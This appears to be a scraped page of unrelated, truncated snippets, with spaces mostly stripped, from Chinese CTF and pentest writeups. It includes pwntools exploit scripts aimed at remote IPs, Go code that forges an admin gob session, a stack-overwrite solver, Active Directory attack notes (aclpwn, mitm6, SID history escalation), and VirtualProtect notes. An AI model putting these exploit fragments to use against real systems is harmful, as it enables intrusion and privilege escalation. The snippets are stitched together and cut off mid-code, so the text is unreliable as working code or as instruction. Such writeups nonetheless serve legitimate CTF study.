/usr/bin/env python# -*- coding: utf-8 -*-frompwnimport*importrequests,sys,os,urllib,IPythons=requests.session()#URL = 'http://localhost:23333/'URL='http://39.96.13.247:9999/'defadd_person(name,is_tutor=0):url=URL+'add_person?'url+='name='+urllib.quote(name)url+='&is_tutor=...
error){for_,v:=rangeobj{gob.Register(v)}buf:=bytes.NewBuffer(nil)err:=gob.NewEncoder(buf).Encode(obj)returnbuf.Bytes(),err}funcmain(){varuidint64=1obj:=map[interface{}]interface{}{"username":"admin","UID":uid}data,err:=EncodeGob(obj)iferr...
今年的XCTF最后一战ACTF圆满结束了,战队最后也是稳住了19名,应该能拿到决赛门票。 但ACTF中,pwn题凄惨爆零。虽然只有俺做,但这不能成为摆烂的理由,毕竟要不断成长为战队主力,而且身边有很多很强的同龄师傅,更不应该气馁。 在军训途中复现了Tree_pwn,在uuu师傅(https://caffeine.darkflow.top/)的引导下学到了如...
aclpwn.py Invoke-ACLPwn Abusing IPv6 with mitm6 Compromising IPv4 networks via IPv6 mitm6 SID History Abuse WUT IS DIS?: If we manage to compromise a child domain of a forest andSID filteringisn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain ...
frompwnimport*offset=0x84#p = remote('111.198.29.45',58615)p=process('./stack2')p.sendlineafter("How many numbers you have:",'1')p.sendlineafter("Give me your numbers",'1')# 由于总共要完成8次覆写,并且还需要按照程序的流程正常运转,故需要写一个简易的函数;defchange(addr,num):p.sendli...
【jarvisoj刷题之旅】pwn题目Tell Me Something的writeup 题目信息: file一下 发现是64位的ELF checksec检查下安全性 objdump -t 文件名 可以查看符号表 这里可以看到good_game很可疑 IDA 分析一下也可以看到flag.txt,read,read等 分别双击这个Input your message 和flag.txt 的引用 然后F5 ... ...
#include<Memoryapi.h>BOOLVirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect); VirtualProtect()函数有4个参数,lpAddress是要改变属性的内存起始地址,dwSize是要改变属性的内存区域大小,flAllocationType是内存新的属性类型,lpflOldProtect内存原始属性类型保存地址。而flAllocationType...